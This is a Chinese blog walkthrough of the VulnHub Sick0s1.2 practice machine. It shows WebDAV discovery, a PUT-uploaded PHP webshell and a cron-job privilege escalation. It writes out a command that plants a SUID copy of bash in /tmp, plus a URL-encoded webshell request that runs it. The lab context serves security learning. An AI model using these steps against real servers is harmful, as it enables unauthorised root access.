zoukankan      html  css  js  c++  java
  • 9. Sick0s1.2 靶机

    https://www.vulnhub.com/entry/sickos-12,144/

    简介

    image-20210430105951571

    web 渗透

    扫了网站 / 发现 /test 目录,再次尝试扫描。没有发现有用的。

    用 nikto,提醒支持的 http 方法,尝试用这几个方法请求这两个目录。

    image-20210430113117522

    最终发现用 OPTIONS /test/ 响应中支持 dav http 协议。

    image-20210430112943866

    注意到 PUT 方法,201 提示创建成功。

    image-20210430113535854

    image-20210430113615165

    reverse_shell 半天反不回来,可能有防火墙,那就尝试一句话 webshell

    此处也可以尝试绑定常见端口。

    image-20210430114251917

    写入一句话,用 蚁剑连接。

    image-20210501093659827

    image-20210501093859758

    提权

    查看定时任务

    image-20210511165006107

    image-20210511165123473

    一个个搜索 exp。

    因为搜索次数多了,就知道哪些常见定时任务不存在漏洞,此时就可以减少工作量

    image-20210511165641914

    这两个 exp 是同一个漏洞,大意为 /tmp/update 会定时被root 用户执行。

    echo "cp /bin/bash /tmp/bsh;chmod 4555 /tmp/bsh" > /tmp/update;chmod 755 /tmp/update
    

    有个问题,在于蚁剑 terminal 输入这条命令出错了。因为命令中含有分号。

    image-20210511170225907

    这是工具的bug,可以尝试换一个工具,或者用 xxd 命令写入,或者直接请求的 webshell

    # 直接请求 webshell
    /test/shell2.php?cmd=passthru('echo%20%22cp%20%2fbin%2fbash%20%2ftmp%2fbsh%3bchmod%204555%20%2ftmp%2fbsh%22%20%3e%20%2ftmp%2fupdate')%3b
    

    等待。。。06:25

    image-20210511171400754

    之后 /tmp/bsh -p 即可获取 root shell

  • 相关阅读:
    Maven
    SVN
    SSH 互信
    Linux TCP 连接数
    Linux 查看服务进程运行时间
    Linux cache 缓存过大
    TCP 链接 存在大量 close_wait 等待
    windows 查看链接数
    Linux 创建 时间命名 文件
    bzoj 1059 二分图匹配
  • 原文地址:https://www.cnblogs.com/starrys/p/14759811.html
Copyright © 2011-2022 走看看